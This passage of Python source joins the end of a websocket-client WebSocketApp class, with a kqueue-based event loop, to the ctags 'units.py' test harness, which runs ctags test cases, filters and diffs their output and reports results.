on_cont_message=None,
keep_running=True, get_mask_key=None, cookie=None,
subprotocols=None):
"""
url: websocket url.
header: custom header for websocket handshake.
on_open: callable object which is called at opening websocket.
this function has one argument. The arugment is this class object.
on_message: callbale object which is called when recieved data.
on_message has 2 arguments.
The 1st arugment is this class object.
The passing 2nd arugment is utf-8 string which we get from the server.
on_error: callable object which is called when we get error.
on_error has 2 arguments.
The 1st arugment is this class object.
The passing 2nd arugment is exception object.
on_close: callable object which is called when closed the connection.
this function has one argument. The arugment is this class object.
on_cont_message: callback object which is called when recieve continued
frame data.
on_message has 3 arguments.
The 1st arugment is this class object.
The passing 2nd arugment is utf-8 string which we get from the server.
The 3rd arugment is continue flag. if 0, the data continue
to next frame data
keep_running: a boolean flag indicating whether the app's main loop
should keep running, defaults to True
get_mask_key: a callable to produce new mask keys,
see the WebSocket.set_mask_key's docstring for more information
subprotocols: array of available sub protocols. default is None.
"""
self.url = url
self.header = header
self.cookie = cookie
self.on_open = on_open
self.on_message = on_message
self.on_error = on_error
self.on_close = on_close
self.on_ping = on_ping
self.on_pong = on_pong
self.on_cont_message = on_cont_message
self.keep_running = keep_running
self.get_mask_key = get_mask_key
self.sock = None
self.last_ping_tm = 0
self.subprotocols = subprotocols
def send(self, data, opcode=ABNF.OPCODE_TEXT):
"""
send message.
data: message to send. If you set opcode to OPCODE_TEXT,
data must be utf-8 string or unicode.
opcode: operation code of data. default is OPCODE_TEXT.
"""
if not self.sock or self.sock.send(data, opcode) == 0:
raise WebSocketConnectionClosedException("Connection is already closed.")
def close(self):
"""
close websocket connection.
"""
self.keep_running = False
if self.sock:
self.sock.close()
def _send_ping(self, interval, event):
while not event.wait(interval):
self.last_ping_tm = time.time()
if self.sock:
self.sock.ping()
def run_forever(self, sockopt=None, sslopt=None,
ping_interval=0, ping_timeout=None,
http_proxy_host=None, http_proxy_port=None,
http_no_proxy=None, http_proxy_auth=None,
skip_utf8_validation=False):
"""
run event loop for WebSocket framework.
This loop is infinite loop and is alive during websocket is available.
sockopt: values for socket.setsockopt.
sockopt must be tuple
and each element is argument of sock.setscokopt.
sslopt: ssl socket optional dict.
ping_interval: automatically send "ping" command
every specified period(second)
if set to 0, not send automatically.
ping_timeout: timeout(second) if the pong message is not recieved.
http_proxy_host: http proxy host name.
http_proxy_port: http proxy port. If not set, set to 80.
http_no_proxy: host names, which doesn't use proxy.
skip_utf8_validation: skip utf8 validation.
"""
if not ping_timeout or ping_timeout <= 0:
ping_timeout = None
if sockopt is None:
sockopt = []
if sslopt is None:
sslopt = {}
if self.sock:
raise WebSocketException("socket is already opened")
thread = None
close_frame = None
try:
self.sock = WebSocket(self.get_mask_key,
sockopt=sockopt, sslopt=sslopt,
fire_cont_frame=self.on_cont_message and True or False,
skip_utf8_validation=skip_utf8_validation)
self.sock.settimeout(getdefaulttimeout())
kq = select.kqueue()
self.sock.connect(self.url, header=self.header, cookie=self.cookie,
http_proxy_host=http_proxy_host,
http_proxy_port=http_proxy_port,
http_no_proxy=http_no_proxy, http_proxy_auth=http_proxy_auth,
subprotocols=self.subprotocols)
# Initialise the master fd(s.fileno()) from server socket
kevent = select.kevent(self.sock.sock,
filter=select.KQ_FILTER_READ, # we are interested in reads
flags=select.KQ_EV_ADD | select.KQ_EV_ENABLE)
self._callback(self.on_open)
if ping_interval:
event = threading.Event()
thread = threading.Thread(target=self._send_ping, args=(ping_interval, event))
thread.setDaemon(True)
thread.start()
while self.sock.connected:
#r, w, e = select.select((self.sock.sock, ), (), (), ping_timeout)
revents = kq.control([kevent], 1, None)
if not self.keep_running:
break
if ping_timeout and self.last_ping_tm and time.time() - self.last_ping_tm > ping_timeout:
self.last_ping_tm = 0
raise WebSocketTimeoutException("ping timed out")
for event in revents:
if (event.filter == select.KQ_FILTER_READ):
#cl,_ = s.accept()
op_code, frame = self.sock.recv_data_frame(True)
if op_code == ABNF.OPCODE_CLOSE:
close_frame = frame
break
elif op_code == ABNF.OPCODE_PING:
self._callback(self.on_ping, frame.data)
elif op_code == ABNF.OPCODE_PONG:
self._callback(self.on_pong, frame.data)
elif op_code == ABNF.OPCODE_CONT and self.on_cont_message:
self._callback(self.on_cont_message, frame.data, frame.fin)
else:
data = frame.data
if six.PY3 and frame.opcode == ABNF.OPCODE_TEXT:
data = data.decode("utf-8")
self._callback(self.on_message, data)
#handle_connection(cl)
# if r:
# op_code, frame = self.sock.recv_data_frame(True)
# if op_code == ABNF.OPCODE_CLOSE:
# close_frame = frame
# break
# elif op_code == ABNF.OPCODE_PING:
# self._callback(self.on_ping, frame.data)
# elif op_code == ABNF.OPCODE_PONG:
# self._callback(self.on_pong, frame.data)
# elif op_code == ABNF.OPCODE_CONT and self.on_cont_message:
# self._callback(self.on_cont_message, frame.data, frame.fin)
# else:
# data = frame.data
# if six.PY3 and frame.opcode == ABNF.OPCODE_TEXT:
# data = data.decode("utf-8")
# self._callback(self.on_message, data)
except Exception as e:
self._callback(self.on_error, e)
finally:
if thread:
event.set()
thread.join()
self.keep_running = False
self.sock.close()
self._callback(self.on_close,
*self._get_close_args(close_frame.data if close_frame else None))
self.sock = None
def _get_close_args(self, data):
""" this functions extracts the code, reason from the close body
if they exists, and if the self.on_close except three arguments """
import inspect
# if the on_close callback is "old", just return empty list
if not self.on_close or len(inspect.getargspec(self.on_close).args) != 3:
return []
if data and len(data) >= 2:
code = 256*six.byte2int(data[0:1]) + six.byte2int(data[1:2])
reason = data[2:].decode('utf-8')
return [code, reason]
return [None, None]
def _callback(self, callback, *args):
if callback:
try:
callback(self, *args)
except Exception as e:
error(e)
if isEnableForDebug():
_, _, tb = sys.exc_info()
traceback.print_tb(tb)
|
units.py | #!/usr/bin/env python3
#
# units.py - Units test harness for ctags
#
# Copyright (C) 2019 Ken Takata
# (Based on "units" written by Masatake YAMATO.)
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#
# Python 3.5 or later is required.
# On Windows, unix-like shell (e.g. bash) and some unix tools (sed,
# diff, etc.) are needed.
#
import time # for debugging
import argparse
import filecmp
import glob
import io
import os
import platform
import queue
import re
import shutil
import stat
import subprocess
import sys
import threading
#
# Global Parameters
#
SHELL = '/bin/sh'
CTAGS = './ctags'
READTAGS = './readtags'
OPTSCRIPT = './optscript'
WITH_TIMEOUT = 0
WITH_VALGRIND = False
COLORIZED_OUTPUT = True
CATEGORIES = []
UNITS = []
LANGUAGES = []
PRETENSE_OPTS = ''
RUN_SHRINK = False
SHOW_DIFF_OUTPUT = False
NUM_WORKER_THREADS = 4
DIFF_U_NUM = 0
#
# Internal variables and constants
#
_FEATURE_LIST = []
_PREPERE_ENV = ''
_DEFAULT_CATEGORY = 'ROOT'
_TIMEOUT_EXIT = 124
_VG_TIMEOUT_FACTOR = 10
_VALGRIND_EXIT = 58
_STDERR_OUTPUT_NAME = 'STDERR.tmp'
_DIFF_OUTPUT_NAME = 'DIFF.tmp'
_VALGRIND_OUTPUT_NAME = 'VALGRIND.tmp'
#
# Results
#
L_PASSED = []
L_FIXED = []
L_FAILED_BY_STATUS = []
L_FAILED_BY_DIFF = []
L_SKIPPED_BY_FEATURES = []
L_SKIPPED_BY_LANGUAGES = []
L_SKIPPED_BY_ILOOP = []
L_KNOWN_BUGS = []
L_FAILED_BY_TIMEED_OUT = []
L_BROKEN_ARGS_CTAGS = []
L_VALGRIND = []
TMAIN_STATUS = True
TMAIN_FAILED = []
def remove_prefix(string, prefix):
if string.startswith(prefix):
return string[len(prefix):]
else:
return string
def is_cygwin():
system = platform.system()
return system.startswith('CYGWIN_NT') or system.startswith('MINGW32_NT')
def isabs(path):
if is_cygwin():
import ntpath
if ntpath.isabs(path):
return True
return os.path.isabs(path)
def action_help(parser, action, *args):
parser.print_help()
return 0
def error_exit(status, msg):
print(msg, file=sys.stderr)
sys.exit(status)
def line(*args, file=sys.stdout):
if len(args) > 0:
ch = args[0]
else:
ch = '-'
print(ch * 60, file=file)
def remove_readonly(func, path, _):
# Clear the readonly bit and reattempt the removal
os.chmod(path, stat.S_IWRITE | stat.S_IREAD)
dname = os.path.dirname(path)
os.chmod(dname, os.stat(dname).st_mode | stat.S_IWRITE)
func(path)
def clean_bundles(bundles):
if not os.path.isfile(bundles):
return
with open(bundles, 'r') as f:
for fn in f.read().splitlines():
if os.path.isdir(fn):
shutil.rmtree(fn, onerror=remove_readonly)
elif os.path.isfile(fn):
os.remove(fn)
os.remove(bundles)
def clean_tcase(d, bundles):
if os.path.isdir(d):
clean_bundles(bundles)
for fn in glob.glob(d + '/*.tmp'):
os.remove(fn)
for fn in glob.glob(d + '/*.TMP'):
os.remove(fn)
def check_availability(cmd):
if not shutil.which(cmd):
error_exit(1, cmd + ' command is not available')
def check_units(name, category):
if len(UNITS) == 0:
return True
for u in UNITS:
ret = re.match(r'(.+)/(.+)', u)
if ret:
if ret.group(1, 2) == (category, name):
return True
elif u == name:
return True
return False
def init_features():
global _FEATURE_LIST
ret = subprocess.run([CTAGS, '--quiet', '--options=NONE', '--list-features', '--with-list=no'],
stdout=subprocess.PIPE, stderr=subprocess.DEVNULL)
_FEATURE_LIST = re.sub(r'(?m)^([^ ]+).*$', r'\1',
ret.stdout.decode('utf-8')).splitlines()
def check_features(feature, ffile):
features = []
if feature:
features = [feature]
elif os.path.isfile(ffile):
with open(ffile, 'r') as f:
features = f.read().splitlines()
for expected in features:
if expected == '':
continue
found = False
found_unexpectedly = False
if expected[0] == '!':
if expected[1:] in _FEATURE_LIST:
found_unexpectedly = True
else:
if expected in _FEATURE_LIST:
found = True
if found_unexpectedly:
return (False, expected)
elif not found:
return (False, expected)
return (True, '')
def check_languages(cmdline, lfile):
if not os.path.isfile(lfile):
return (True, '')
ret = subprocess.run(cmdline + ['--list-languages'],
stdout=subprocess.PIPE, stderr=subprocess.DEVNULL)
langs = ret.stdout.decode('utf-8').splitlines()
with open(lfile, 'r') as f:
for expected in f.read().splitlines():
found = False
if expected in langs:
found = True
if not found:
return (False, expected)
return (True, '')
def decorate(decorator, msg, colorized):
if decorator == 'red':
num = '31'
elif decorator == 'green':
num = '32'
elif decorator == 'yellow':
num = '33'
else:
error_exit(1, 'INTERNAL ERROR: wrong run_result function')
if colorized:
return "\x1b[" + num + 'm' + msg + "\x1b[m"
else:
return msg
def run_result(result_type, msg, output, *args, file=sys.stdout):
func_dict = {
'skip': run_result_skip,
'error': run_result_error,
'ok': run_result_ok,
'known_error': run_result_known_error,
}
func_dict[result_type](msg, file, COLORIZED_OUTPUT, *args)
file.flush()
if output:
with open(output, 'w') as f:
func_dict[result_type](msg, f, False, *args)
def run_result_skip(msg, f, colorized, *args):
s = msg + decorate('yellow', 'skipped', colorized)
if len(args) > 0:
s += ' (' + args[0] + ')'
print(s, file=f)
def run_result_error(msg, f, colorized, *args):
s = msg + decorate('red', 'failed', colorized)
if len(args) > 0:
s += ' (' + args[0] + ')'
print(s, file=f)
def run_result_ok(msg, f, colorized, *args):
s = msg + decorate('green', 'passed', colorized)
if len(args) > 0:
s += ' (' + args[0] + ')'
print(s, file=f)
def run_result_known_error(msg, f, colorized, *args):
s = msg + decorate('yellow', 'failed', colorized) + ' (KNOWN bug)'
print(s, file=f)
def run_shrink(cmdline_template, finput, foutput, lang):
script = sys.argv[0]
script = os.path.splitext(script)[0] # remove '.py'
print('Shrinking ' + finput + ' as ' + lang)
# fallback to the shell script version
subprocess.run([SHELL, script, 'shrink',
'--timeout=1', '--foreground',
cmdline_template, finput, foutput])
# return a filter for normalizing the basename
#
# If internal is True, return a pair of [pattern, replacement],
# otherwise return a list of command line arguments.
def basename_filter(internal, output_type):
filters_external = {
'ctags': 's%\(^[^\t]\{1,\}\t\)\(/\{0,1\}\([^/\t]\{1,\}/\)*\)%\\1%',
# "input" in the expresion is for finding input file names in the TAGS file.
# RAWOUT.tmp:
#
# ./Units/parser-ada.r/ada-etags-suffix.d/input_0.adb,238
# package body Input_0 is ^?Input_0/b^A1,0
#
# With the original expression, both "./Units/parser-ada.r/ada-etags-suffix.d/"
# and "package body Input_0 is Input_0/' are deleted.
# FILTERED.tmp:
#
# input_0.adb,238
# b^A1,0
#
# Adding "input" ot the expression is for deleting only the former one and for
# skpping the later one.
#
# FIXME: if "input" is included as a substring of tag entry names, filtering
# with this expression makes the test fail.
'etags': 's%.*\/\(input[-._][[:print:]]\{1,\}\),\([0-9]\{1,\}$\)%\\1,\\2%',
'xref': 's%\(.*[[:digit:]]\{1,\} \)\([^ ]\{1,\}[^ ]\{1,\}\)/\([^ ].\{1,\}.\{1,\}$\)%\\1\\3%',
'json': 's%\("path": \)"[^"]\{1,\}/\([^/"]\{1,\}\)"%\\1"\\2"%',
}
filters_internal = {
'ctags': [r'(^[^\t]+\t)(/?([^/\t]+/)*)', r'\1'],
# See above comments about "input".
'etags': [r'.*/(input[-._]\S+),([0-9]+$)', r'\1,\2'],
'xref': [r'(.*\d+ )([^ ]+[^ ]+)/([^ ].+.+$)', r'\1\3'],
'json': [r'("path": )"[^"]+/([^/"]+)"', r'\1"\2"'],
}
if internal:
return filters_internal[output_type]
else:
return ['sed', '-e', filters_external[output_type]]
# convert a command line list to a command line string
def join_cmdline(cmdline):
# surround with '' if an argument includes spaces or '\'
# TODO: use more robust way
return ' '.join("'" + x + "'" if (' ' in x) or ('\\' in x) else x
for x in cmdline)
def run_record_cmdline(cmdline, ffilter, ocmdline, output_type):
with open(ocmdline, 'w') as f:
print("%s\n%s \\\n| %s \\\n| %s\n" % (
_PREPERE_ENV,
join_cmdline(cmdline),
join_cmdline(basename_filter(False, output_type)),
ffilter), file=f)
def prepare_bundles(frm, to, obundles):
for src in glob.glob(frm + '/*'):
fn = os.path.basename(src)
if fn.startswith('input.'):
continue
elif fn.startswith('expected.tags'):
continue
elif fn.startswith('README'):
continue
elif fn in ['features', 'languages', 'filters']:
continue
elif fn == 'args.ctags':
continue
else:
dist = to + '/' + fn
if os.path.isdir(src):
shutil.copytree(src, dist, copy_function=shutil.copyfile)
else:
shutil.copyfile(src, dist)
with open(obundles, 'a') as f:
print(dist, file=f)
def anon_normalize_sub(internal, ctags, input_actual, *args):
# TODO: "Units" should not be hardcoded.
input_expected = './Units' + re.sub(r'^.*?/Units', r'', input_actual, 1)
ret = subprocess.run([CTAGS, '--quiet', '--options=NONE', '--_anonhash=' + input_actual],
stdout=subprocess.PIPE)
actual = ret.stdout.decode('utf-8').splitlines()[0]
ret = subprocess.run([CTAGS, '--quiet', '--options=NONE', '--_anonhash=' + input_expected],
stdout=subprocess.PIPE)
expected = ret.stdout.decode('utf-8').splitlines()[0]
if internal:
retlist = [[actual, expected]]
else:
retlist = ['-e', 's/' + actual + '/' + expected + '/g']
if len(args) > 0:
return retlist + anon_normalize_sub(internal, ctags, *args)
else:
return retlist
def is_anon_normalize_needed(rawout):
with open(rawout, 'r', errors='ignore') as f:
if re.search(r'[0-9a-f]{8}', f.read()):
return True
return False
# return a list of filters for normalizing anonhash
#
# If internal is True, return a list of pairs of [pattern, replacement],
# otherwise return a list of command line arguments.
def anon_normalize(internal, rawout, ctags, input_actual, *args):
if is_anon_normalize_needed(rawout):
return anon_normalize_sub(internal, ctags, input_actual, *args)
else:
return []
def run_filter(finput, foutput, base_filter, anon_filters):
pat1 = [re.compile(base_filter[0]), base_filter[1]]
pat2 = [(re.compile(p[0]), p[1]) for p in anon_filters]
with open(finput, 'r', errors='surrogateescape') as fin, \
open(foutput, 'w', errors='surrogateescape', newline='\n') as fout:
for l in fin:
l = pat1[0].sub(pat1[1], l, 1)
for p in pat2:
l = p[0].sub(p[1], l)
print(l, end='', file=fout)
def guess_lang(cmdline, finput):
ret = subprocess.run(cmdline + ['--print-language', finput],
stdout=subprocess.PIPE, stderr=subprocess.DEVNULL)
return re.sub(r'^.*: ', r'',
ret.stdout.decode('utf-8').replace("\r\n", "\n").replace("\n", ''))
def guess_lang_from_log(log):
with open(log, 'r', encoding='utf-8', errors='ignore') as f:
for l in f:
ret = re.match('OPENING.* as (.*) language .*file ', l)
if ret:
return ret.group(1)
return ''
def run_tcase(finput, t, name, tclass, category, build_t, extra_inputs):
global L_PASSED
global L_FIXED
global L_FAILED_BY_STATUS
global L_FAILED_BY_DIFF
global L_SKIPPED_BY_FEATURES
global L_SKIPPED_BY_LANGUAGES
global L_SKIPPED_BY_ILOOP
global L_KNOWN_BUGS
global L_FAILED_BY_TIMEED_OUT
global L_BROKEN_ARGS_CTAGS
global L_VALGRIND
o = build_t
fargs = t + '/args.ctags'
ffeatures = t + '/features'
flanguages = t + '/languages'
ffilter = t + '/filter'
fexpected = t + '/expected.tags'
output_type = 'ctags'
output_label = ''
output_tflag = []
output_feature = ''
output_lang_extras = ''
if os.path.isfile(fexpected):
pass
elif os.path.isfile(t + '/expected.tags-e'):
fexpected = t + '/expected.tags-e'
output_type = 'etags'
output_label = '/' + output_type
output_tflag = ['-e', '--tag-relative=no']
elif os.path.isfile(t + '/expected.tags-x'):
fexpected = t + '/expected.tags-x'
output_type = 'xref'
output_label = '/' + output_type
output_tflag = ['-x']
elif os.path.isfile(t + '/expected.tags-json'):
fexpected = t + '/expected.tags-json'
output_type = 'json'
output_label = '/' + output_type
output_tflag = ['--output-format=json']
output_feature = 'json'
if len(extra_inputs) > 0:
output_lang_extras = ' (multi inputs)'
if not shutil.which(ffilter):
ffilter = 'cat'
ostderr = o + '/' + _STDERR_OUTPUT_NAME
orawout = o + '/RAWOUT.tmp'
ofiltered = o + '/FILTERED.tmp'
odiff = o + '/' + _DIFF_OUTPUT_NAME
ocmdline = o + '/CMDLINE.tmp'
ovalgrind = o + '/' + _VALGRIND_OUTPUT_NAME
oresult = o + '/RESULT.tmp'
oshrink_template = o + '/SHRINK-%s.tmp'
obundles = o + '/BUNDLES'
broken_args_ctags = False
#
# Filtered by UNIT
#
if not check_units(name, category):
return False
#
# Build cmdline
#
cmdline = [CTAGS, '--verbose', '--options=NONE', '--fields=-T']
if PRETENSE_OPTS != '':
cmdline += [PRETENSE_OPTS]
cmdline += ['--optlib-dir=+' + t + '/optlib', '-o', '-']
if os.path.isfile(fargs):
cmdline += ['--options=' + fargs]
ret = subprocess.run(cmdline + ['--_force-quit=0'],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
if ret.returncode != 0:
broken_args_ctags = True
#
# make a backup (basedcmdline) of cmdline. basedcmdline is used
# as a command line template for running shrinker. basedcmdline
# should not include the name of the input file name. The
# shrinker makes a another cmdline by applying a real input file
# name to the template. On the other hand, cmdline is
# destructively updated by appending input file name in this
# function. The file name should not be included in the cmdline
# template.
#
# To avoid the updating in this function propagating to
# basecmdline, we copy the cmdline here.
#
basecmdline = cmdline[:]
#
# Filtered by LANGUAGES
#
guessed_lang = None
if len(LANGUAGES) > 0:
guessed_lang = guess_lang(basecmdline, finput)
if not guessed_lang in LANGUAGES:
return False
clean_tcase(o, obundles)
os.makedirs(o, exist_ok=True)
if not os.path.samefile(o, t):
prepare_bundles(t, o, obundles)
# helper function for building some strings based on guessed_lang
def build_strings(guessed_lang):
return ('%-59s ' % ('Testing ' + name + ' as ' + guessed_lang + output_lang_extras + output_label),
join_cmdline(basecmdline) + ' --language-force=' + guessed_lang + ' %s > /dev/null 2>&1',
oshrink_template % (guessed_lang.replace('/', '-')))
(tmp, feat) = check_features(output_feature, ffeatures)
if not tmp:
if not guessed_lang:
guessed_lang = guess_lang(basecmdline, finput)
msg = build_strings(guessed_lang)[0]
L_SKIPPED_BY_FEATURES += [category + '/' + name]
if feat.startswith('!'):
run_result('skip', msg, oresult, 'unwanted feature "' + feat[1:] + '" is available')
else:
run_result('skip', msg, oresult, 'required feature "' + feat + '" is not available')
return False
(tmp, lang) = check_languages(basecmdline, flanguages)
if not tmp:
if not guessed_lang:
guessed_lang = guess_lang(basecmdline, finput)
msg = build_strings(guessed_lang)[0]
L_SKIPPED_BY_LANGUAGES += [category + '/' + name]
run_result('skip', msg, oresult, 'required language parser "' + lang + '" is not available')
return False
if WITH_TIMEOUT == 0 and tclass == 'i':
if not guessed_lang:
guessed_lang = guess_lang(basecmdline, finput)
msg = build_strings(guessed_lang)[0]
L_SKIPPED_BY_ILOOP += [category + '/' + name]
run_result('skip', msg, oresult, 'may cause an infinite loop')
return False
if broken_args_ctags:
if not guessed_lang:
guessed_lang = guess_lang(basecmdline, finput)
msg = build_strings(guessed_lang)[0]
L_BROKEN_ARGS_CTAGS += [category + '/' + name]
run_result('error', msg, None, 'broken args.ctags?')
return False
cmdline += output_tflag + [finput]
if len(extra_inputs) > 0:
cmdline += extra_inputs
timeout_value = WITH_TIMEOUT
if WITH_VALGRIND:
cmdline = ['valgrind', '--leak-check=full', '--track-origins=yes',
'--error-exitcode=' + str(_VALGRIND_EXIT), '--log-file=' + ovalgrind] + cmdline
timeout_value *= _VG_TIMEOUT_FACTOR
if timeout_value == 0:
timeout_value = None
start = time.time()
try:
with open(orawout, 'wb') as fo, \
open(ostderr, 'wb') as fe:
ret = subprocess.run(cmdline, stdout=fo, stderr=fe,
timeout=timeout_value)
run_record_cmdline(cmdline, ffilter, ocmdline, output_type)
except subprocess.TimeoutExpired:
if not guessed_lang:
guessed_lang = guess_lang(basecmdline, finput)
(msg, cmdline_template, oshrink) = build_strings(guessed_lang)
L_FAILED_BY_TIMEED_OUT += [category + '/' + name]
run_result('error', msg, oresult, 'TIMED OUT')
run_record_cmdline(cmdline, ffilter, ocmdline, output_type)
if RUN_SHRINK and len(extra_inputs) == 0:
run_shrink(cmdline_template, finput, oshrink, guessed_lang)
return False
#print('execute time: %f' % (time.time() - start))
guessed_lang = guess_lang_from_log(ostderr)
(msg, cmdline_template, oshrink) = build_strings(guessed_lang)
if ret.returncode != 0:
if WITH_VALGRIND and ret.returncode == _VALGRIND_EXIT and \
tclass != 'v':
L_VALGRIND += [category + '/' + name]
run_result('error', msg, oresult, 'valgrind-error')
run_record_cmdline(cmdline, ffilter, ocmdline, output_type)
return False
elif tclass == 'b':
L_KNOWN_BUGS += [category + '/' + name]
run_result('known_error', msg, oresult)
run_record_cmdline(cmdline, ffilter, ocmdline, output_type)
if RUN_SHRINK and len(extra_inputs) == 0:
run_shrink(cmdline_template, finput, oshrink, guessed_lang)
return True
else:
L_FAILED_BY_STATUS += [category + '/' + name]
run_result('error', msg, oresult, 'unexpected exit status: ' + str(ret.returncode))
run_record_cmdline(cmdline, ffilter, ocmdline, output_type)
if RUN_SHRINK and len(extra_inputs) == 0:
run_shrink(cmdline_template, finput, oshrink, guessed_lang)
return False
elif WITH_VALGRIND and tclass == 'v':
L_FIXED += [category + '/' + name]
if not os.path.isfile(fexpected):
clean_tcase(o, obundles)
if tclass == 'b':
L_FIXED += [category + '/' + name]
elif tclass == 'i':
L_FIXED += [category + '/' + name]
L_PASSED += [category + '/' + name]
run_result('ok', msg, None, '"expected.tags*" not found')
return True
start = time.time()
if ffilter != 'cat':
# Use external filter
filter_cmd = basename_filter(False, output_type) + \
anon_normalize(False, orawout, CTAGS, finput, *extra_inputs) + \
['<', orawout]
filter_cmd += ['|', ffilter]
filter_cmd += ['>', ofiltered]
#print(filter_cmd)
subprocess.run([SHELL, '-c', join_cmdline(filter_cmd)])
else:
# Use internal filter
run_filter(orawout, ofiltered, basename_filter(True, output_type),
anon_normalize(True, orawout, CTAGS, finput, *extra_inputs))
#print('filter time: %f' % (time.time() - start))
start = time.time()
if filecmp.cmp(fexpected, ofiltered):
ret.returncode = 0
else:
with open(odiff, 'wb') as f:
ret = subprocess.run(['diff', '-U', str(DIFF_U_NUM),
'-I', '^!_TAG', '--strip-trailing-cr', fexpected, ofiltered],
stdout=f)
#print('diff time: %f' % (time.time() - start))
if ret.returncode == 0:
clean_tcase(o, obundles)
if tclass == 'b':
L_FIXED += [category + '/' + name]
elif WITH_TIMEOUT != 0 and tclass == 'i':
L_FIXED += [category + '/' + name]
L_PASSED += [category + '/' + name]
run_result('ok', msg, None)
return True
else:
if tclass == 'b':
L_KNOWN_BUGS += [category + '/' + name]
run_result('known_error', msg, oresult)
run_record_cmdline(cmdline, ffilter, ocmdline, output_type)
return True
else:
L_FAILED_BY_DIFF += [category + '/' + name]
run_result('error', msg, oresult, 'unexpected output')
run_record_cmdline(cmdline, ffilter, ocmdline, output_type)
return False
def create_thread_queue(func):
q = queue.Queue()
threads = []
for i in range(NUM_WORKER_THREADS):
t = threading.Thread(target=worker, args=(func, q), daemon=True)
t.start()
threads.append(t)
return (q, threads)
def worker(func, q):
while True:
item = q.get()
if item is None:
break
try:
func(*item)
except:
import traceback
traceback.print_exc()
q.task_done()
def join_workers(q, threads):
# block until all tasks are done
try:
q.join()
except KeyboardInterrupt:
# empty the queue
while True:
try:
q.get_nowait()
except queue.Empty:
break
# try to stop workers
for i in range(NUM_WORKER_THREADS):
q.put(None)
for t in threads:
t.join(timeout=2)
# exit regardless that workers are stopped
sys.exit(1)
# stop workers
for i in range(NUM_WORKER_THREADS):
q.put(None)
for t in threads:
t.join()
def accepted_file(fname):
# Ignore backup files
return not fname.endswith('~')
def run_dir(category, base_dir, build_base_dir):
#
# Filtered by CATEGORIES
#
if len(CATEGORIES) > 0 and not category in CATEGORIES:
return False
print("\nCategory: " + category)
line()
(q, threads) = create_thread_queue(run_tcase)
for finput in glob.glob(base_dir + '/*.[dbtiv]/input.*'):
finput = finput.replace('\\', '/') # for Windows
if not accepted_file(finput):
continue
dname = os.path.dirname(finput)
extra_inputs = sorted(map(lambda x: x.replace('\\', '/'), # for Windows
filter(accepted_file,
glob.glob(dname + '/input[-_][0-9].*') +
glob.glob(dname + '/input[-_][0-9][-_]*.*')
)))
tcase_dir = dname
build_tcase_dir = build_base_dir + remove_prefix(tcase_dir, base_dir)
ret = re.match(r'^.*/(.*)\.([dbtiv])$', tcase_dir)
(name, tclass) = ret.group(1, 2)
q.put((finput, tcase_dir, name, tclass, category, build_tcase_dir, extra_inputs))
join_workers(q, threads)
def run_show_diff_output(units_dir, t):
print("\t", end='')
line('.')
for fn in glob.glob(units_dir + '/' + t + '.*/' + _DIFF_OUTPUT_NAME):
with open(fn, 'r') as f:
for l in f:
print("\t" + l, end='')
print()
def run_show_stderr_output(units_dir, t):
print("\t", end='')
line('.')
for fn in glob.glob(units_dir + '/' + t + '.*/' + _STDERR_OUTPUT_NAME):
with open(fn, 'r') as f:
lines = f.readlines()
for l in lines[-50:]:
print("\t" + l, end='')
print()
def run_show_valgrind_output(units_dir, t):
print("\t", end='')
line('.')
for fn in glob.glob(units_dir + '/' + t + '.*/' + _VALGRIND_OUTPUT_NAME):
with open(fn, 'r') as f:
for l in f:
print("\t" + l, end='')
print()
def run_summary(build_dir):
print()
print('Summary (see CMDLINE.tmp to reproduce without test harness)')
line()
fmt = ' %-40s%d'
print(fmt % ('#passed:', len(L_PASSED)))
print(fmt % ('#FIXED:', len(L_FIXED)))
for t in L_FIXED:
print("\t" + remove_prefix(t, _DEFAULT_CATEGORY + '/'))
print(fmt % ('#FAILED (broken args.ctags?):', len(L_BROKEN_ARGS_CTAGS)))
for t in L_BROKEN_ARGS_CTAGS:
print("\t" + remove_prefix(t, _DEFAULT_CATEGORY + '/'))
print(fmt % ('#FAILED (unexpected-exit-status):', len(L_FAILED_BY_STATUS)))
for t in L_FAILED_BY_STATUS:
print("\t" + remove_prefix(t, _DEFAULT_CATEGORY + '/'))
if SHOW_DIFF_OUTPUT:
run_show_stderr_output(build_dir, remove_prefix(t, _DEFAULT_CATEGORY + '/'))
print(fmt % ('#FAILED (unexpected-output):', len(L_FAILED_BY_DIFF)))
for t in L_FAILED_BY_DIFF:
print("\t" + remove_prefix(t, _DEFAULT_CATEGORY + '/'))
if SHOW_DIFF_OUTPUT:
run_show_stderr_output(build_dir, remove_prefix(t, _DEFAULT_CATEGORY + '/'))
run_show_diff_output(build_dir, remove_prefix(t, _DEFAULT_CATEGORY + '/'))
if WITH_TIMEOUT != 0:
print(fmt % ('#TIMED-OUT (' + str(WITH_TIMEOUT) + 's):', len(L_FAILED_BY_TIMEED_OUT)))
for t in L_FAILED_BY_TIMEED_OUT:
print("\t" + remove_prefix(t, _DEFAULT_CATEGORY + '/'))
print(fmt % ('#skipped (features):', len(L_SKIPPED_BY_FEATURES)))
for t in L_SKIPPED_BY_FEATURES:
print("\t" + remove_prefix(t, _DEFAULT_CATEGORY + '/'))
print(fmt % ('#skipped (languages):', len(L_SKIPPED_BY_LANGUAGES)))
for t in L_SKIPPED_BY_LANGUAGES:
print("\t" + remove_prefix(t, _DEFAULT_CATEGORY + '/'))
if WITH_TIMEOUT == 0:
print(fmt % ('#skipped (infinite-loop):', len(L_SKIPPED_BY_ILOOP)))
for t in L_SKIPPED_BY_ILOOP:
print("\t" + remove_prefix(t, _DEFAULT_CATEGORY + '/'))
print(fmt % ('#known-bugs:', len(L_KNOWN_BUGS)))
for t in L_KNOWN_BUGS:
print("\t" + remove_prefix(t, _DEFAULT_CATEGORY + '/'))
if WITH_VALGRIND:
print(fmt % ('#valgrind-error:', len(L_VALGRIND)))
for t in L_VALGRIND:
print("\t" + remove_prefix(t, _DEFAULT_CATEGORY + '/'))
if SHOW_DIFF_OUTPUT:
print(fmt % ('##valgrind-error:', len(L_VALGRIND)))
for t in L_VALGRIND:
print("\t" + remove_prefix(t, _DEFAULT_CATEGORY + '/'))
run_show_valgrind_output(build_dir, remove_prefix(t, _DEFAULT_CATEGORY + '/'))
def make_pretense_map(arg):
r = ''
